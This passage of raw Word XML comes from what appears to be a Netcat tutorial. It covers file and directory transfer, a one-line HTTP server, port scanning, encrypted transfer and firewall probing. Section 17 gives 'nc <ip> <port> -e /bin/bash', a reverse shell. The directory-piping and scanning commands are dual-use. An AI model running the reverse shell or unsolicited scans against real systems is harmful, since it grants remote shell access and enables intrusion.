                      <a:ext cx="2933333" cy="523810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01472E15"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005DB1C4">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BF872A"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10. Transfer Multiple Files Using Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B11E31"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2DE00B2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tar czf - &lt;dir&gt; | nc &lt;target_ip&gt; &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071925C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sends multiple files or an entire directory over the network. The tar command is used to archive and compress the files, and Netcat transmits them over the specified port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB51D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150FA80C" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>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&lt;dir&gt;: The directory to send.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AE84B1" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>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t>&lt;target_ip&gt;: The IP address of the receiving system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062533D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5C42D27D"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tar czf - /home/user/docs | nc 192.168.1.1 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD9EF60" w14:textId="744169BA" w:rsidR="000F3B60" w:rsidRDefault="000F3B60" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F3B60">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C8207D9" wp14:editId="7373CC4C">
            <wp:extent cx="4553585" cy="523948"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="59940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08981" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4553585" cy="523948"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DBE467" w14:textId="121162BB" w:rsidR="00040AC1" w:rsidRPr="000D5AC4" w:rsidRDefault="00040AC1" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040AC1">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40056ACA" wp14:editId="2ADE8C78">
            <wp:extent cx="3562847" cy="552527"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="118583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5868" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3562847" cy="552527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A91EA44"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257966CD">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD4F8EA"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11. Simple Web Server (HTTP Response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DE40C"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6802A5A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echo -e "HTTP/1.1 200 OK\n\n &lt;html&gt;&lt;body&gt;&lt;h1&gt;Welcome&lt;/h1&gt;&lt;/body&gt;&lt;/html&gt;" | nc -l -p 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4899FD4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sets up a simple HTTP server that returns a hardcoded HTML response when a connection is made on port 8080. It's useful for testing HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5695EE5F"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lastRenderedPageBreak/>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E69617"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echo -e "HTTP/1.1 200 OK\n\n &lt;html&gt;&lt;body&gt;&lt;h1&gt;Hello, World!&lt;/h1&gt;&lt;/body&gt;&lt;/html&gt;" | nc -l -p 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FA8350" w14:textId="1EDB751A" w:rsidR="00E94D1A" w:rsidRDefault="00E94D1A" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E94D1A">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64283784" wp14:editId="49B68088">
            <wp:extent cx="6286500" cy="380365"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="129106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66897" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6286500" cy="380365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E24B9" w14:textId="67700F87" w:rsidR="00E94D1A" w:rsidRPr="000D5AC4" w:rsidRDefault="00E94D1A" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E94D1A">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5110A58E" wp14:editId="06AC0790">
            <wp:extent cx="4315427" cy="1114581"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16677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53738" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4315427" cy="1114581"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3918D98E"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3D697B99">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="095EF754"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12. Listen and Redirect Output to a File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4303B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74F2782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&lt;port&gt; &gt; output.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F7F62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Netcat can listen on a port and save any incoming data to a file. This is useful for logging incoming connections or saving transferred data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AB711E"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571F46CA"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1234 &gt; data_received.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508081D8" w14:textId="033D5305" w:rsidR="006541B3" w:rsidRPr="000D5AC4" w:rsidRDefault="006541B3" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006541B3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62A6A0E2" wp14:editId="2D76F58B">
            <wp:extent cx="2286319" cy="476316"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="214166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61822" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2286319" cy="476316"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EBAABE"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12B77C7E">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02226D"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13. Send Data from File to Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF7C8C"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7F89F59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&lt;target_ip&gt; &lt;port&gt; &lt; inputfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA000C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sends the contents of a file to a target system over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A47BB"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17AE9353"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192.168.1.1 1234 &lt; myfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8D0E74" w14:textId="6E34D163" w:rsidR="006541B3" w:rsidRPr="000D5AC4" w:rsidRDefault="006541B3" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006541B3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B51B53A" wp14:editId="08A2726D">
            <wp:extent cx="2972215" cy="504895"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1945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119" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2972215" cy="504895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F568815"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242FB46F">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AF588E"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14. TCP Connect Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E53200"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6DBC11D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-v -z &lt;target_ip&gt; &lt;port_range&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6305A89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performs a TCP connect scan to check which ports on the target machine are open. It is similar to port scanning with Nmap but uses Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B21A54F"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Options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CFBC97" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5AC4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-v: Verbose mode to show detailed connection information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3082AE1F"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205E96C2"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-v -z 192.168.1.1 20-80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153BC2CA" w14:textId="5FE6A51B" w:rsidR="006541B3" w:rsidRPr="000D5AC4" w:rsidRDefault="006541B3" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006541B3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E58F4EC" wp14:editId="25B8BBBB">
            <wp:extent cx="4620270" cy="781159"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="185743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34224" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4620270" cy="781159"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CA4C7E"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5529C4D0">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E56A91"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15. Listening for Connections on Multiple Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3632FD"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4C4EE67B"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&lt;port1&gt; -l &lt;port2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ECDCF8"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sets up Netcat to listen on multiple ports simultaneously. It allows monitoring multiple connections at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE5D93A"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32CB7CAF"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 1234 -l 5678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F78D90" w14:textId="681F6787" w:rsidR="00040AC1" w:rsidRPr="000D5AC4" w:rsidRDefault="00040AC1" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040AC1">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17D3905E" wp14:editId="2A563653">
            <wp:extent cx="1752845" cy="1438476"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14266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6344" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1752845" cy="1438476"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B0DA8"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3E704C22">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C7B5D4"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16. Secure Transfer with Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2297710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26D7689E"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openssl enc -aes-256-cbc -salt -in file.txt | nc &lt;target_ip&gt; &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D537C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encrypts the data with AES-256-CBC before sending it through Netcat. It ensures the transfer of sensitive information is encrypted during transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC9F14F"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243B54FE"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openssl enc -aes-256-cbc -salt -in file.txt | nc 192.168.1.1 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FD245F" w14:textId="0A73AD1A" w:rsidR="005912D0" w:rsidRPr="000D5AC4" w:rsidRDefault="005912D0" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005912D0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12C479A4" wp14:editId="7C6FA800">
            <wp:extent cx="6286500" cy="815975"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="179680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06225" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6286500" cy="815975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13386054"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752595C1">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D43800"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17. Execute Commands Remotely via Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C754EC4"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0B5B64F0"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&lt;target_ip&gt; &lt;port&gt; -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3BF359"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lastRenderedPageBreak/>
        <w:t>Functionality:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5AC4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> This command allows you to execute a shell remotely. It connects to a target machine and runs a shell, sending the input and output back over the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F384F5"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43408CDC"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192.168.1.1 1234 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DDCE54" w14:textId="6FEDF879" w:rsidR="00A95CD0" w:rsidRPr="000D5AC4" w:rsidRDefault="00A95CD0" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CD0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1762337E" wp14:editId="2D5E343A">
            <wp:extent cx="4658375" cy="876422"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="113855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50524" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4658375" cy="876422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E68B64E"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3DEF1269">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="322694C5"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t>18. Detecting Firewall Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D261985"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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ADAF87"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-v -z -w 1 &lt;target_ip&gt; &lt;port_range&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673387F6"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Functionality:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5AC4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> This command is useful for detecting if a firewall is blocking certain ports. By specifying a timeout with -w, you can check which ports are accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF3D1DE"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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC701E6" w14:textId="77777777" w:rsid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nc -v -z -w 1 192.168.1.1 80-100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E19297C" w14:textId="0D31131B" w:rsidR="00A95CD0" w:rsidRPr="000D5AC4" w:rsidRDefault="00A95CD0" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95CD0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EB698B9" wp14:editId="2E0DC79A">
            <wp:extent cx="5696745" cy="4582164"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="121973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34611" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5696745" cy="4582164"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
